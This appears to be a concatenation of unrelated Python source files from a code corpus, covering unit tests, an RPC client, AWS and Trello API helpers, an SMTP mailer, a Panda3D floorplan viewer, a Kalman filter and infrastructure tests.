Test _create_alembic_folder function. Tests the
creation of folders alembic/versions, alembic/alembic.ini,
alembic/env.py. Absolute path is passed in this
test.
'''
mock_cptr.return_value = True
mock_ospth.join.return_value = '/testfolder'
mock_ospth.exists.return_value = False
mock_pth.mkdir.return_value = True
mock_cpyfile.return_value = True
model_obj = ModelGenerator()
response = model_obj._create_alembic_folder(init='/testfolder')
self.assertEqual(response, True)
mock_cptr.assert_called_with(mock_ospth.join(), mock_ospth.join())
@mock.patch('modelgen.ModelGenerator._create_template_folder')
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.copytree')
@mock.patch('modelgen.modelgenerator.copyfile')
def test_create_alembic_folder_exists(self, mock_cpyfile, mock_cptr, mock_ospth, mock_ctf):
'''
Test _create_alembic_folder function when folder
already exists. The function raises FileExistsError
'''
mock_ctf.return_value = True
mock_cptr.return_value = True
mock_ospth.join.side_effects = ['./test', './test', './test', './test']
mock_ospth.exists.return_value = True
mock_cpyfile.return_value = True
model_obj = ModelGenerator()
with self.assertRaises(FileExistsError) as err:
model_obj._create_alembic_folder(init='./docs')
@mock.patch('modelgen.modelgenerator.ModelGenerator._create_alembic_folder')
@mock.patch('modelgen.modelgenerator.ModelGenerator._create_template_folder')
@mock.patch('modelgen.modelgenerator.ModelGenerator._create_checkpoint_file')
def test_modelgenerator_init(self, mock_cafldr, mock_ctfldr, mock_cchk):
obj = ModelGenerator(init='./test')
mock_cafldr.assert_called_with(init='./test')
mock_cchk.assert_called_with(init='./test')
mock_ctfldr.assert_called_with(init='./test')
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.ModelGenerator._create_model')
@mock.patch('modelgen.modelgenerator.ModelGenerator._find_checkpoint_file')
def test_modelgenerator_init_create_model_elif_w_yaml_extn(self, mock_fcf,
mock_cm, mock_ospth):
'''
Test modelgen/modelgenerator.py file's __init__ method
when schema yaml file with extension .yaml is passed
'''
mock_ospth.return_value = True
mock_cm.return_value = True
mock_fcf = True
obj = ModelGenerator(createmodel=True, file='./test.yaml')
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.ModelGenerator._create_model')
@mock.patch('modelgen.modelgenerator.ModelGenerator._find_checkpoint_file')
def test_modelgenerator_init_create_model_elif_w_yml_extn(self, mock_fcf,
mock_cm, mock_ospth):
'''
Test modelgen/modelgenerator.py file's __init__ method
when schema yaml file with extension .yml is passed
'''
mock_ospth.return_value = True
mock_cm.return_value = True
mock_fcf = True
obj = ModelGenerator(createmodel=True, file='./test.yml')
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.ModelGenerator._create_model')
@mock.patch('modelgen.modelgenerator.ModelGenerator._find_checkpoint_file')
def test_modelgenerator_init_create_model_elif_wo_yaml_extn(self, mock_fcf, mock_cm, mock_ospth):
'''
Test modelgen/modelgenerator.py file's __init__ method
when schema file without .yaml or .yml is passed. The
function will throw NameError
'''
mock_ospth.return_value = True
mock_cm.return_value = True
mock_fcf = True
with self.assertRaises(NameError) as err:
obj = ModelGenerator(createmodel=True, file='./test.txt')
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.ModelGenerator._create_model')
@mock.patch('modelgen.modelgenerator.ModelGenerator._find_checkpoint_file')
def test_modelgenerator_createmodel_find_checkpoint_file_true(self, mock_fcf,
mock_cm, mock_ospth):
'''
Test _find_checkpoint_file_ when the checkpoint file,
.modelgen, exists.
'''
mock_ospth.return_value = True
mock_cm.return_value = True
mock_fcf = True
obj = ModelGenerator(createmodel=True, file='./test.yaml')
@mock.patch('modelgen.modelgenerator.path')
@mock.patch('modelgen.modelgenerator.ModelGenerator._create_model')
@mock.patch('modelgen.modelgenerator.ModelGenerator._find_checkpoint_file')
def test_modelgenerator_createmodel_find_checkpoint_file_false(self, mock_fcf,
mock_cm, mock_ospth):
'''
Test _find_checkpoint_file_ when the checkpoint file,
.modelgen, doesn't exists.
'''
mock_ospth.return_value = True
mock_cm.return_value = True
mock_fcf.return_value = False
obj = ModelGenerator(createmodel=True, file='./test.yaml')
mock_fcf.assert_called_with()
@mock.patch('modelgen.modelgenerator.Helper.write_to_file')
def test_create_checkpoint_file(self, mock_wrtf):
'''
Test _create_checkpoint_file. The checkpoint file
is created when the modelgen is initialized for the
first time
'''
mock_wrtf.return_value = True
obj = ModelGenerator()
obj._create_checkpoint_file(init='./dummy')
mock_wrtf.assert_called_with(path='./dummy/.modelgen', data='')
@mock.patch('modelgen.modelgenerator.path')
def test_find_checkpoint_file_exists(self, mock_ospth):
mock_ospth.exists.return_value = True
obj = ModelGenerator()
response = obj._find_checkpoint_file()
self.assertEqual(response, True)
mock_ospth.exists.assert_called_with(mock_ospth.join())
@mock.patch('modelgen.modelgenerator.path')
def test_find_checkpoint_file_not_found(self, mock_ospth):
mock_ospth.exists.return_value = False
obj = ModelGenerator()
with self.assertRaises(FileNotFoundError) as err:
obj._find_checkpoint_file()
@classmethod
def tearDownClass(self):
pass
|
15790
|
from twisted.internet import defer, reactor
@defer.inlineCallbacks
def main():
try:
from txmsgpackrpc.client import connect
c = yield connect('localhost', 8000, ssl=True, connectTimeout=5, waitTimeout=5)
data = {
'firstName': 'John',
'lastName': 'Smith',
'isAlive': True,
'age': 25,
'height_cm': 167.6,
'address': {
'streetAddress': "21 2nd Street",
"city": 'New York',
"state": 'NY',
'postalCode': '10021-3100'
},
'phoneNumbers': [
{
'type': 'home',
'number': '212 555-1234'
},
{
'type': 'office',
'number': '646 555-4567'
}
],
'children': [],
'spouse': None
}
res = yield c.createRequest('echo', data)
assert data == res
print res
except Exception:
import traceback
traceback.print_exc()
finally:
reactor.stop()
if __name__ == '__main__':
reactor.callWhenRunning(main)
reactor.run()
|
15797
|
from math import erf, sqrt
from functools import partial
from ..library.multinomial import multinomial, to_multinomial
def gaussian_cdf(x, mu, sigma):
y = (1.0 + erf((x - mu) / (sigma * sqrt(2.0)))) / 2.0
y = (1.0 + erf((x) / (sqrt(2.0)))) / 2.0
assert y >= 0 and y <= 1.0, 'y is not a valid probability: y={}'.format(y)
return y
def gaussian_cdfp(mu, sigma):
return partial(gaussian_cdf, mu=mu, sigma=sigma)
def gaussian(mu, sigma, block, kernel=None):
'''
Construct to create a discrete approximation of the gaussian distribution using mu and sigma
(gaussian 0 1 blocka)
'''
return multinomial(*multinomial(-3, 3, 64, gaussian_cdfp(float(mu), float(sigma))), offset=block, definitions=kernel.definitions)
|
15850
|
import pandas as pd
import numpy as np
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.cross_validation import train_test_split
import utils
import glob, os
import pca.dataanalyzer as da, pca.pca as pca
from sklearn.metrics import accuracy_score
# visulaize the important characteristics of the dataset
import matplotlib.pyplot as plt
seed = 0
num_headers = 16
data_len = 54*num_headers #1460
dirs = ["C:/Users/salik/Documents/Data/LinuxChrome/{}/".format(num_headers),
"C:/Users/salik/Documents/Data/WindowsFirefox/{}/".format(num_headers),
"C:/Users/salik/Documents/Data/WindowsChrome/{}/".format(num_headers),
"C:/Users/salik/Documents/Data/WindowsSalik/{}/".format(num_headers),
"C:/Users/salik/Documents/Data/WindowsAndreas/{}/".format(num_headers)]
# dirs = ["E:/Data/h5/https/", "E:/Data/h5/netflix/"]
# step 1: get the data
dataframes = []
num_examples = 0
for dir in dirs:
for fullname in glob.iglob(dir + '*.h5'):
filename = os.path.basename(fullname)
df = utils.load_h5(dir, filename)
dataframes.append(df)
num_examples = len(df.values)
# create one large dataframe
data = pd.concat(dataframes)
data.sample(frac=1, random_state=seed).reset_index(drop=True)
num_rows = data.shape[0]
columns = data.columns
print(columns)
# step 2: get features (x) and convert it to numpy array
x = da.getbytes(data, data_len)
# step 3: get class labels y and then encode it into number
# get class label data
y = data['label'].values
# encode the class label
class_labels = np.unique(y)
label_encoder = LabelEncoder()
y = label_encoder.fit_transform(y)
# step 4: split the data into training set and test set
test_percentage = 0.5
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=test_percentage, random_state=seed)
plot_savename = "histogram_payload"
from matplotlib import rcParams
# Make room for xlabel which is otherwise cut off
rcParams.update({'figure.autolayout': True})
# scatter plot the sample points among 5 classes
# markers = ('s', 'd', 'o', '^', 'v', ".", ",", "<", ">", "8", "p", "P", "*", "h", "H", "+", "x", "X", "D", "|", "_")
color_map = {0: '#487fff', 1: '#d342ff', 2: '#4eff4e', 3: '#2ee3ff', 4: '#ffca43', 5:'#ff365e', 6:'#626663'}
plt.figure()
for idx, cl in enumerate(np.unique(y_test)):
# Get count of unique values
values, counts = np.unique(x_test[y_test == cl], return_counts=True)
# Maybe remove zero as there is a lot of zeros in the header
# values = values[1:]
# counts = counts[1:]
n, bins, patches = plt.hist(values, weights=counts, bins=256, facecolor=color_map[idx], label=class_labels[cl], alpha=0.8)
plt.legend(loc='upper right')
plt.title('Histogram of : {}'.format(class_labels))
plt.tight_layout()
# plt.savefig('{0}{1}.png'.format(plot_savename, int(perplexity)), dpi=300)
plt.show()
|
15852
|
import time
import uuid
from random import random
def now():
return int(time.time() * 1000)
def uuid1():
return str(uuid.uuid1())
def millis(s):
return s * 1000
def seconds(ms):
return ms / 1000
def exponential_backoff(
attempts,
base_delay,
max_delay=None,
jitter=True,
):
"""
Get the next delay for retries in exponential backoff.
attempts: Number of attempts so far
base_delay: Base delay, in seconds
max_delay: Max delay, in seconds. If None (default), there is no max.
jitter: If True, add a random jitter to the delay
"""
if max_delay is None:
max_delay = float("inf")
backoff = min(max_delay, base_delay * 2 ** max(attempts - 1, 0))
if jitter:
backoff = backoff * random()
return backoff
|
15873
|
import json
import requests
class Searchs(object):
__module__ = 'trello'
def __init__(self, apikey, token=None):
self._apikey = apikey
self._token = token
def get(self, query, idOrganizations, idBoards=None, idCards=None, modelTypes=None, board_fields=None, boards_limit=None, card_fields=None, cards_limit=None, card_board=None, card_list=None, card_members=None, organization_fields=None, organizations_limit=None, member_fields=None, members_limit=None, action_fields=None, actions_limit=None, actions_since=None, partial=None):
resp = requests.get("https://trello.com/1/search" % (), params=dict(key=self._apikey, token=self._token, query=query, idOrganizations=idOrganizations, idBoards=idBoards, idCards=idCards, modelTypes=modelTypes, board_fields=board_fields, boards_limit=boards_limit, card_fields=card_fields, cards_limit=cards_limit, card_board=card_board, card_list=card_list, card_members=card_members, organization_fields=organization_fields, organizations_limit=organizations_limit, member_fields=member_fields, members_limit=members_limit, action_fields=action_fields, actions_limit=actions_limit, actions_since=actions_since, partial=partial), data=None)
resp.raise_for_status()
return resp.json()
|
15908
|
r"""
This is the base module for all other objects of the package.
+ `LaTeX` returns a LaTeX string out of an `Irene` object.
+ `base` is the parent of all `Irene` objects.
"""
def LaTeX(obj):
r"""
Returns LaTeX representation of Irene's objects.
"""
from sympy.core.core import all_classes
from Irene import SDPRelaxations, SDRelaxSol, Mom
inst = isinstance(obj, SDPRelaxations) or isinstance(
obj, SDRelaxSol) or isinstance(obj, Mom)
if inst:
return obj.__latex__()
elif isinstance(obj, tuple(all_classes)):
from sympy import latex
return latex(obj)
class base(object):
r"""
All the modules in `Irene` extend this class which perform some common
tasks such as checking existence of certain softwares.
"""
def __init__(self):
from sys import platform
self.os = platform
if self.os == 'win32':
import os
BASE = os.sep.join(os.path.dirname(os.path.realpath(__file__)).split(os.sep)) + os.sep
self.Path = dict(csdp=BASE+"csdp.exe", sdpa=BASE+"sdpa.exe")
else:
self.Path = dict(csdp="csdp", sdpa="sdpa")
def which(self, program):
r"""
Check the availability of the `program` system-wide.
Returns the path of the program if exists and returns
'None' otherwise.
"""
import os
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
def AvailableSDPSolvers(self):
r"""
find the existing sdp solvers.
"""
existsing = []
# CVXOPT
try:
import cvxopt
existsing.append('CVXOPT')
except ImportError:
pass
if self.os == 'win32':
from os.path import isfile
# DSDP
if ('dsdp' in self.Path):
if isfile(self.Path['dsdp']):
existsing.append('DSDP')
# SDPA
if ('sdpa' in self.Path):
if isfile(self.Path['sdpa']):
existsing.append('SDPA')
if ('csdp' in self.Path):
if isfile(self.Path['csdp']):
existsing.append('CSDP')
else:
# DSDP
if self.which('dsdp5') is not None:
existsing.append('DSDP')
# SDPA
if self.which('sdpa') is not None:
existsing.append('SDPA')
# CSDP
if self.which('csdp') is not None:
existsing.append('CSDP')
return existsing
|
15917
|
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.header import Header
from email.mime.base import MIMEBase
from email import encoders
import os
import uuid
import smtplib
import re
class CTEmail(object):
def __init__(self, usr, pwd, server='smtp.qq.com', port=25, hide=True):
self.user = usr
self.password = <PASSWORD>
self.server = server
self.port = port
self.hide = hide
self.pattern_img = r'(<EMAIL_IMG>.+</EMAIL_IMG>)'
def attach_image(self, img_dict):
"""
Attach image to use it in HTML mail body
:param img_dict:
:return: MIMEImage attachment
"""
with open(img_dict['path'], 'rb') as file:
msg_image = MIMEImage(file.read(), name=os.path.basename(img_dict['path']))
msg_image.add_header('Content-ID', '<{}>'.format(img_dict['cid']))
return msg_image
def attach_file(self, filename):
"""
Attach file to mail letter
:param filename: str
:return: MIMEBase attachment
"""
part = MIMEBase('application', 'octet-stream')
data = open(filename, 'rb').read()
part.set_payload(data)
encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename=%s' % os.path.basename(filename))
return part
def prepare_email(self, subject, recipients, content, images):
"""
Prepare mail body with attachments.
Basically this function form message.
:param subject: str
:param recipients: list
:param content: str
:param images: list
:return: message object
"""
msg = MIMEMultipart('related')
msg['Subject'] = Header(subject, 'utf-8')
msg['From'] = self.user
if self.hide:
msg['bcc'] = 'undisclosed-recipients'
else:
msg['to'] = ','.join(recipients)
msg_alternative = MIMEMultipart('alternative')
img_list = []
if images:
index = 0
for image in images:
image = dict(title='Image {0}'.format(index), path=image, cid=str(uuid.uuid4()))
img_html = '<div dir="ltr"><img src="cid:{cid}" ' \
'alt="Image should appear here...but this did not happened (" ' \
'style="display: block; color: #666666; ' \
'font-family: Helvetica, arial, sans-serif; font-size: 16px;" ' \
'class="img-max"></div>'.format(cid=image['cid'])
content = re.sub(self.pattern_img, img_html, content, 1)
img_list.append(image)
index += 1
msg_html = MIMEText(content, 'html', 'utf-8')
msg_alternative.attach(msg_html)
msg.attach(msg_alternative)
# the sequence of images attachment matters, so need twice check
if img_list:
for img in img_list:
msg.attach(self.attach_image(img))
return msg
def send_email(self, subject, content_path, recipients):
"""
This function send email to the list of recipients.
Images are automatically added if content_path is directory
(assumed that this directory contains html+images)
:param subject: str
:param content_path: str
:param recipients: list
:return: None
"""
if os.path.exists(content_path):
if os.path.isdir(content_path):
files = sorted(os.listdir(content_path))
images = []
for file in files:
path = os.path.join(content_path, file)
if file.endswith('.html'):
content = open(path, 'r').read()
elif file.endswith('.jpg') or file.endswith('.jpeg') or file.endswith('.png'):
images.append(path)
elif os.path.isfile(content_path):
content = open(content_path, 'r', encoding='utf-8').read()
msg = self.prepare_email(subject, recipients, content, images)
mailServer = smtplib.SMTP(self.server, self.port)
mailServer.ehlo()
mailServer.starttls()
mailServer.ehlo()
mailServer.login(self.user, self.password)
mailServer.sendmail(self.user, recipients, msg.as_string())
mailServer.quit()
|
15932
|
from math import pi, sin, cos
from panda3d.core import *
from direct.showbase.ShowBase import ShowBase
from direct.task import Task
from floorplan import Floorplan
import numpy as np
import random
import copy
class Viewer(ShowBase):
def __init__(self):
ShowBase.__init__(self)
#self.scene = self.loader.loadModel("floorplan_1.txt-floor.obj")
#self.scene = base.loader.loadModel("floorplan_1.txt-floor.egg")
#self.scene = base.loader.loadModel("panda.egg")
#self.scene = base.loader.loadModel("environment")
base.setBackgroundColor(0, 0, 0)
self.angle = 0.0
lens = PerspectiveLens()
lens.setFov(60)
lens.setNear(0.01)
lens.setFar(100000)
base.cam.node().setLens(lens)
floorplan = Floorplan('test/floorplan_7')
#floorplan.setFilename('test/floorplan_2')
floorplan.read()
self.scene = floorplan.generateEggModel()
self.scene.reparentTo(self.render)
#self.scene.setScale(0.01, 0.01, 0.01)
#self.scene.setTwoSided(True)
self.scene.setTwoSided(True)
#self.scene.setPos(0, 0, 3)
#texture = loader.loadTexture("floorplan_1.png")
#self.scene.setTexture(texture)
#self.scene.setHpr(0, 0, 0)
# angleDegrees = 0
# angleRadians = angleDegrees * (pi / 180.0)
# self.camera.setPos(20 * sin(angleRadians), -20 * cos(angleRadians), 3)
# self.camera.setHpr(angleDegrees, 0, 0)
#self.camera.lookAt(0, 0, 0)
self.alight = AmbientLight('alight')
self.alight.setColor(VBase4(0.2, 0.2, 0.2, 1))
self.alnp = self.render.attachNewNode(self.alight)
self.render.setLight(self.alnp)
dlight = DirectionalLight('dlight')
dlight.setColor(VBase4(1, 1, 1, 1))
dlnp = self.render.attachNewNode(dlight)
#dlnp.setHpr(0, -90, 0)
dlnp.setPos(0.5, 0.5, 3)
dlnp.lookAt(0.5, 0.5, 2)
self.render.setLight(dlnp)
for i in xrange(10):
plight = PointLight('plight')
plight.setAttenuation((1, 0, 1))
color = random.randint(10, 15)
plight.setColor(VBase4(color, color, color, 1))
plnp = self.render.attachNewNode(plight)
if i == 0:
plnp.setPos(0.5, 0.5, 3)
else:
plnp.setPos(1 * random.random(), 1 * random.random(), 0.3)
pass
self.render.setLight(plnp)
#base.useTrackball()
#base.trackball.node().setPos(2.0, 0, 3)
#base.trackball.node().setHpr(0, 0, 3)
#base.enableMouse()
#base.useDrive()
base.disableMouse()
self.taskMgr.add(self.spinCameraTask, "SpinCameraTask")
#self.accept('arrow_up', self.moveForward)
#self.accept('arrow_up_-repeat', self.moveForward)
self.topDownCameraPos = [0.5, 0.5, 1.5]
self.topDownTarget = [0.5, 0.499, 0.5]
self.topDownH = 0
self.startCameraPos = floorplan.startCameraPos
self.startTarget = floorplan.startTarget
self.startH = 0
self.cameraPos = self.topDownCameraPos
self.target = self.topDownTarget
self.H = self.topDownH
self.accept('space', self.openDoor)
self.accept('enter', self.startChangingView)
self.viewMode = 'T'
self.viewChangingProgress = 1.02
ceiling = self.scene.find("**/ceiling")
ceiling.hide()
return
def moveForward(self):
self.cameraPos[0] -= 0.1
def openDoor(self):
minDistance = 10000
doors = self.scene.find("**/doors")
for door in doors.getChildren():
mins, maxs = door.getTightBounds()
vec_1 = (mins + maxs) / 2 - Vec3(self.target[0], self.target[1], (mins[2] + maxs[2]) / 2)
vec_2 = (mins + maxs) / 2 - Vec3(self.cameraPos[0], self.cameraPos[1], (mins[2] + maxs[2]) / 2)
if (vec_1.dot(vec_2) > 0 and vec_1.length() > vec_2.length()) or np.arccos(abs(vec_1.dot(vec_2)) / (vec_1.length() * vec_2.length())) > np.pi / 4:
continue
distance = pow(pow(self.cameraPos[0] - (mins[0] + maxs[0]) / 2, 2) + pow(self.cameraPos[1] - (mins[1] + maxs[1]) / 2, 2) + pow(self.cameraPos[2] - (mins[2] + maxs[2]) / 2, 2), 0.5)
if distance < minDistance:
minDistanceDoor = door
minDistance = distance
pass
continue
if minDistance > 1:
return
mins, maxs = minDistanceDoor.getTightBounds()
if abs(maxs[0] - mins[0]) > abs(maxs[1] - mins[1]):
minsExpected = Vec3(mins[0] - (maxs[1] - mins[1]), mins[1], mins[2])
maxsExpected = Vec3(mins[0], mins[1] + (maxs[0] - mins[0]), maxs[2])
else:
minsExpected = Vec3(mins[0] - (maxs[1] - mins[1]) + (maxs[0] - mins[0]), mins[1] - (maxs[0] - mins[0]), mins[2])
maxsExpected = Vec3(mins[0] + (maxs[0] - mins[0]), mins[1] + (maxs[0] - mins[0]) - (maxs[0] - mins[0]), maxs[2])
pass
minDistanceDoor.setH(minDistanceDoor, 90)
mins, maxs = minDistanceDoor.getTightBounds()
minDistanceDoor.setPos(minDistanceDoor, minsExpected[1] - mins[1], -minsExpected[0] + mins[0], 0)
#print(scene.findAllMatches('doors'))
return
def startChangingView(self):
self.viewChangingProgress = 0
self.prevCameraPos = copy.deepcopy(self.cameraPos)
self.prevTarget = copy.deepcopy(self.target)
self.prevH = self.camera.getR()
if self.viewMode == 'T':
self.newCameraPos = self.startCameraPos
self.newTarget = self.startTarget
self.newH = self.startH
self.viewMode = 'C'
else:
self.newCameraPos = self.topDownCameraPos
self.newTarget = self.topDownTarget
self.newH = self.topDownH
self.startCameraPos = copy.deepcopy(self.cameraPos)
self.startTarget = copy.deepcopy(self.target)
self.startH = self.camera.getR()
self.viewMode = 'T'
pass
return
def changeView(self):
self.cameraPos = []
self.target = []
for c in xrange(3):
self.cameraPos.append(self.prevCameraPos[c] + (self.newCameraPos[c] - self.prevCameraPos[c]) * self.viewChangingProgress)
self.target.append(self.prevTarget[c] + (self.newTarget[c] - self.prevTarget[c]) * self.viewChangingProgress)
continue
self.H = self.prevH + (self.newH - self.prevH) * self.viewChangingProgress
if self.viewChangingProgress + 0.02 >= 1 and self.viewMode == 'C':
ceiling = self.scene.find("**/ceiling")
ceiling.show()
pass
if self.viewChangingProgress <= 0.02 and self.viewMode == 'T':
ceiling = self.scene.find("**/ceiling")
ceiling.hide()
pass
return
def spinCameraTask(self, task):
#print(task.time)
#angleDegrees = task.time * 6.0
movementStep = 0.003
if self.viewChangingProgress <= 1.01:
self.changeView()
self.viewChangingProgress += 0.02
pass
if base.mouseWatcherNode.is_button_down('w'):
for c in xrange(2):
step = movementStep * (self.target[c] - self.cameraPos[c])
self.cameraPos[c] += step
self.target[c] += step
continue
pass
if base.mouseWatcherNode.is_button_down('s'):
for c in xrange(2):
step = movementStep * (self.target[c] - self.cameraPos[c])
self.cameraPos[c] -= step
self.target[c] -= step
continue
pass
if base.mouseWatcherNode.is_button_down('a'):
step = movementStep * (self.target[0] - self.cameraPos[0])
self.cameraPos[1] += step
self.target[1] += step
step = movementStep * (self.target[1] - self.cameraPos[1])
self.cameraPos[0] -= step
self.target[0] -= step
pass
if base.mouseWatcherNode.is_button_down('d'):
step = movementStep * (self.target[0] - self.cameraPos[0])
self.cameraPos[1] -= step
self.target[1] -= step
step = movementStep * (self.target[1] - self.cameraPos[1])
self.cameraPos[0] += step
self.target[0] += step
pass
rotationStep = 0.02
if base.mouseWatcherNode.is_button_down('arrow_left'):
angle = np.angle(complex(self.target[0] - self.cameraPos[0], self.target[1] - self.cameraPos[1]))
angle += rotationStep
self.target[0] = self.cameraPos[0] + np.cos(angle)
self.target[1] = self.cameraPos[1] + np.sin(angle)
pass
if base.mouseWatcherNode.is_button_down('arrow_right'):
angle = np.angle(complex(self.target[0] - self.cameraPos[0], self.target[1] - self.cameraPos[1]))
angle -= rotationStep
self.target[0] = self.cameraPos[0] + np.cos(angle)
self.target[1] = self.cameraPos[1] + np.sin(angle)
pass
if base.mouseWatcherNode.is_button_down('arrow_up'):
angle = np.arcsin(self.target[2] - self.cameraPos[2])
angle += rotationStep
self.target[2] = self.cameraPos[2] + np.sin(angle)
pass
if base.mouseWatcherNode.is_button_down('arrow_down'):
angle = np.arcsin(self.target[2] - self.cameraPos[2])
angle -= rotationStep
self.target[2] = self.cameraPos[2] + np.sin(angle)
pass
angleDegrees = self.angle
angleRadians = angleDegrees * (pi / 180.0)
#self.camera.setPos(2.0 * sin(angleRadians), -2.0 * cos(angleRadians), 3)
self.camera.setPos(self.cameraPos[0], self.cameraPos[1], self.cameraPos[2])
#self.camera.setHpr(angleDegrees, 0, 0)
#self.camera.lookAt(0, 0, 0)
self.camera.lookAt(self.target[0], self.target[1], self.target[2])
self.camera.setR(self.H)
#if base.mouseWatcherNode.hasMouse()
return Task.cont
app = Viewer()
app.run()
|
15934
|
import numpy as np
class KF1D:
# this EKF assumes constant covariance matrix, so calculations are much simpler
# the Kalman gain also needs to be precomputed using the control module
def __init__(self, x0, A, C, K):
self.x = x0
self.A = A
self.C = C
self.K = K
self.A_K = self.A - np.dot(self.K, self.C)
# K matrix needs to be pre-computed as follow:
# import control
# (x, l, K) = control.dare(np.transpose(self.A), np.transpose(self.C), Q, R)
# self.K = np.transpose(K)
def update(self, meas):
self.x = np.dot(self.A_K, self.x) + np.dot(self.K, meas)
return self.x
|
15987
|
import boto3
comprehend = boto3.client(service_name='comprehend')
translate = boto3.client(service_name='translate')
def detect_language(text):
"""
Detects the dominant language in a text
Parameters
----------
text: string, required
Input text
Returns
-------
string
Representing language code of the dominant language
"""
# Sending call to get language
result = comprehend.detect_dominant_language(Text = text)['Languages']
# Since the result can contain more than one language find the one with the highest score.
high_score = 0
best_guess = ''
for lang in range(len(result)):
if result[lang]['Score'] > high_score:
high_score = result[lang]['Score']
best_guess = result[lang]['LanguageCode']
return best_guess
def translate_text(text, source_lang, destination_lang):
"""
Translates given text from source language into destination language
Parameters
----------
text: string, required
Input text in source language
Returns
-------
string
Translated text in destination language
"""
result = translate.translate_text(Text=text,
SourceLanguageCode=source_lang, TargetLanguageCode=destination_lang)
return result.get('TranslatedText')
|
16009
|
import os
import pytest
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')
@pytest.mark.parametrize("installed_packages", [
("haproxy20"),
("socat"),
("keepalived"),
("bind"),
])
def test_packages_installed(host, installed_packages):
rpackage = host.package(installed_packages)
assert rpackage.is_installed
@pytest.mark.parametrize("services", [
("haproxy"),
# ("keepalive"),
("named"),
])
def test_services_running_and_enabled(host, services):
service = host.service(services)
assert service.is_enabled
assert service.is_running
@pytest.mark.parametrize("files", [
("/etc/pki/haproxy/star_haproxy.pem"),
])
def test_star_haproxy_pem(host, files):
star_haproxy_pem = host.file(files)
assert star_haproxy_pem.user == "root"
assert star_haproxy_pem.group == "root"
assert star_haproxy_pem.mode == 0o600
assert star_haproxy_pem.contains('-----BEGIN CERTIFICATE-----')
assert star_haproxy_pem.contains('-----BEGIN RSA PRIVATE KEY-----')
def test_sysctl_non_local_bind(host):
non_local_bind = host.sysctl("net.ipv4.ip_nonlocal_bind")
assert non_local_bind == 1
|
16020
|
import sys
from django.core.management import CommandError, call_command
from django.test import TestCase
from .side_effects import bad_database_check
try:
from unittest.mock import patch
except ImportError:
from mock import patch
# Python 2.7 support
if sys.version_info > (3, 0):
from io import StringIO
else:
from io import BytesIO as StringIO
class CommandTestCase(TestCase):
def test_command(self):
out = StringIO()
call_command("healthcheck", stdout=out)
self.assertIn("OK", out.getvalue())
def test_command_failed(self):
with patch(
"django_alive.checks.check_database", side_effect=bad_database_check
):
with self.assertRaises(CommandError):
call_command("healthcheck")
|
16022
|
import os
import pytest
import torch
import torch.distributed as dist
from ignite.distributed.comp_models import has_native_dist_support
if not has_native_dist_support:
pytest.skip("Skip if no native dist support", allow_module_level=True)
else:
from ignite.distributed.comp_models.native import _expand_hostlist, _NativeDistModel, _setup_ddp_vars_from_slurm_env
# tests from https://github.com/LLNL/py-hostlist/blob/master/hostlist/unittest_hostlist.py
@pytest.mark.parametrize(
"hostlist, expected",
[
("localhost", "localhost"),
("compute!:b24_[1-2].r", "compute!:b24_1.r,compute!:b24_2.r"),
("quartz[4-8]", "quartz4,quartz5,quartz6,quartz7,quartz8"),
("c1001a-[11,17]", "c1001a-11,c1001a-17"),
("c1001a-s[11,17]", "c1001a-s11,c1001a-s17"),
("c1009a-s17,c1010a-s11", "c1009a-s17,c1010a-s11"),
(
"gpu-compute-on-demand-dy-g4dnxlarge-[1-4]",
"gpu-compute-on-demand-dy-g4dnxlarge-1,"
"gpu-compute-on-demand-dy-g4dnxlarge-2,"
"gpu-compute-on-demand-dy-g4dnxlarge-3,"
"gpu-compute-on-demand-dy-g4dnxlarge-4",
),
(
"node[18-19,1-16,21-22]",
"node1,node2,node3,node4,node5,"
"node6,node7,node8,node9,node10,"
"node11,node12,node13,node14,node15,"
"node16,node18,node19,node21,node22",
),
(
"node[4-8,12,16-20,22,24-26]",
"node4,node5,node6,node7,node8,"
"node12,node16,node17,node18,"
"node19,node20,node22,node24,"
"node25,node26",
),
("machine2-[02-4]vm1", "machine2-02vm1,machine2-03vm1,machine2-04vm1"),
(
"machine2-[02-3]vm1, machine4-[0003-5].vml2",
"machine2-02vm1,machine2-03vm1,machine4-0003.vml2,machine4-0004.vml2,machine4-0005.vml2",
),
("machine2-[009-11]vm1", "machine2-009vm1,machine2-010vm1,machine2-011vm1"),
("node[1,2,3]", "node1,node2,node3"),
(
"compute-b24-[1-3,5-9], compute-b25-[1,4,8],compute-b25-[2-9,13]",
"compute-b24-1,compute-b24-2,compute-b24-3,compute-b24-5,compute-b24-6,"
"compute-b24-7,compute-b24-8,compute-b24-9,compute-b25-1,compute-b25-4,"
"compute-b25-8,compute-b25-2,compute-b25-3,compute-b25-4,compute-b25-5,"
"compute-b25-6,compute-b25-7,compute-b25-8,compute-b25-9,compute-b25-13",
),
],
)
def test_expand_hostlist(hostlist, expected):
assert _expand_hostlist(hostlist) == expected.split(",")
def test_expand_hostlist_invalid():
with pytest.raises(ValueError, match=r"hostlist invalid"):
_expand_hostlist("invalid[]")
@pytest.mark.distributed
def test__native_dist_model():
available_backends = _NativeDistModel.available_backends
if dist.is_nccl_available():
assert "nccl" in available_backends
else:
assert "nccl" not in available_backends
if dist.is_gloo_available():
assert "gloo" in available_backends
else:
assert "gloo" not in available_backends
if dist.is_mpi_available():
assert "mpi" in available_backends
else:
assert "mpi" not in available_backends
with pytest.raises(ValueError, match=r"Backend should be one of"):
_NativeDistModel.create_from_backend("abc")
@pytest.mark.distributed
@pytest.mark.skipif(not dist.is_nccl_available(), reason="Skip if nccl not available")
